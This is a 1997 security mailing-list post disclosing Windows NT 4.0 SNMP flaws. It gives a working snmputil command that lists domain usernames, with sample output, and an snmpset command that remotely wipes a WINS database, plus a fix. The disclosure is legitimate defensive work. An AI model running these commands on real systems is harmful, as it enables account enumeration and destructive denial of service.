Date: 10/13/97 6:12:52 PM From: Aleph One Subject: BoS: SNMP Insecurity To: (""@LOCAL) ---------- Forwarded message ---------- Date: Tue, 7 Oct 1997 15:36:13 -0400 From: "Rouland, Christopher J" To: "'ntsecurity@iss.net'" Subject: [NTSEC] SNMP Insecurity All: I have found two significant "features" in the SNMP agent implementations under NT 4.0 Server, and I am sure there are more if I feel like really digging. The first issue I sent in earlier this year to Microsoft and received no response other than "expected behavior" and the second I just found and puts any large NT shop at a serious denial of service (DOS) risk. 1. This first exploit demonstrates the ability via SNMP to dump a list of all usernames in an NT domain (assuming the target box is a DC) or on an NT Server. Here is the simplest NT example I could find to use this: C:\NTRESKIT>snmputil walk public .1.3.6.1.4.1.77.1.2.25 should be a domain controller or server Sample output at end of message. 2.The second exploit demonstrates the ability via SNMP to delete all of the records in a WINS database remotely, bypassing all NT security. If you understand large scale WINS architecture, you can understand the implications of this. Knowledge of SNMP community strings would allow an attacker to effectively shut down any large NT infrastructure with "N" commands (N=number of WINS servers). This is permitted due to the extensive "cmd" set implemented in the WINS extension agent, specifically: cmdDeleteWins OBJECT-TYPE SYNTAX IpAddress ACCESS read-write STATUS mandatory DESCRIPTION "This variable when set will cause all information pertaining to a WINS (data records, context information to be deleted from the local WINS. Use this only when owner-address mapping table is getting to near capacity. NOTE: deletion of all information pertaining to the managed WINS is not permitted" ::= { cmd 3 } Since the SNMP toolset implemented under NT will not do snmp-set-requests, my sample exploit was done using the CMU SNMP development kit under Unix. The command "rnjdev02:~/cmu$ snmpset -v 1 192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2" successfully entirely deleted my WINS database. 3. It appears that there are several other pieces of the LMMIB2 definition that allow for things such as remote session deletion or disconnect, etc, but I have not yet looked into them. 4. The simplest fix is to disable SNMP, or to remove the extension agents through the SNMP configuration in the registry. Regards, Chris -- Chris Rouland Lehman Brothers, Inc. crouland@lehman.com ----- C:\NTRESKIT>snmputil walk 192.178.16.2 public .1.3.6.1.4.1.77.1.2.25 Output: Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.71.117.101.115.116 Value = OCTET STRING - Guest Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.49 Value = OCTET STRING - test1 Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.50 Value = OCTET STRING - test2 Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.51 Value = OCTET STRING - test3 Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.52 Value = OCTET STRING - test4 Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.53 Value = OCTET STRING - test5 Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.54 Value = OCTET STRING - test6 Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.55 Value = OCTET STRING - test7 Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.56 Value = OCTET STRING - test8 Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.5.116.101.115.116.57 Value = OCTET STRING - test9 Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.6.116.101.115.116.49.48 Value = OCTET STRING - test10 Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.8.116.101.115.116.117.115.101.114 Value = OCTET STRING - testuser Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.13.65.100.109.105.110.105.115.116.114.97 .116.111.114 Value = OCTET STRING - Administrator Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.13.73.85.83.82.95.82.78.74.68.69.86.48.4 9 Value = OCTET STRING - IUSR_NT4SRVDEV1 Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU serTable.svUserEntry.svUserName.19.83.81.76.69.120.101.99.117.116.105.11 8.101.67.109.100.69.120.101.99 Value = OCTET STRING - SQLExecutiveCmdExec End of MIB subtree.